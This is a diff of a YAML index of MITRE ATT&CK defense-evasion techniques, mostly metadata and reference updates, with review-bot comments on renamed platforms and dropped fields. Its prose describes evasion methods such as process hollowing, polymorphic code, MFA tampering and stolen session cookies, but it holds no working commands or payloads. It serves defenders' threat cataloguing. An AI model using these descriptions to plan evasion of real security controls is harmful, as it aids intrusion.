x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
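Review bot: The platform list for T1078 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider` (`x_mitre_version` 2.6 to 2.7); the same rename appears later in the diff for T1556.006. Any per-platform index, filter or mapping in the generator that is keyed on the old names will silently stop matching these two techniques, so confirm the platform-to-index mapping was updated alongside this regeneration, and a line in the PR description about the rename would help anyone consuming these indexes by platform. The `x_mitre_modified_by_ref` removed here reappears in the next hunk, so that part is ordering only.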
@@ -9583,11 +9668,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
@@ -9713,7 +9798,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9735,7 +9820,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
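Review bot: the platform list for T1556.006 changes from `Azure AD`, `Office 365` and `Google Workspace` to `Office Suite` and `Identity Provider` (ATT&CK v16 consolidated those platforms), so any per-platform index derived from this file and keyed on the old names must be regenerated in the same change; the same rename appears below for T1550.004, T1656 and T1562.008. This hunk also moves `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` to the top of the entry while the next hunk removes them from the bottom, which is harmless but makes the diff harder to review; a stable key order in the generator would keep future regenerations small.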
@@ -9955,9 +10041,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
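Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1036.001 here along with `spec_version`, and nothing in this hunk replaces it, whereas T1599 and T1548.004 further down keep their `x_mitre_attack_spec_version: 2.1.0` as unchanged context; the same silent drop happens for T1564.006, T1134.005, T1218.009 and T1564.007. Confirm whether the generator is meant to omit the field whenever the upstream object lacks it, or whether these entries should retain it like their neighbours.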
@@ -10038,7 +10119,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
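Review bot: the new T1027.014 entry has no `identifier:` key, while the entry immediately above it ends with `identifier: T1564.006` before `atomic_tests`, and other entries in this file carry the key as well; since some entries in the file omit it, confirm whether the key is meant to be present for every technique and, if so, add `identifier: T1027.014`. Separately, the folded description string contains a stray space before the embedded newline (`polymorphic-sentinelone) \nOther`), which the `|-` block scalar form used for other descriptions in this file would make visible and easy to trim.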
@@ -10128,7 +10277,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
@@ -11040,9 +11150,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
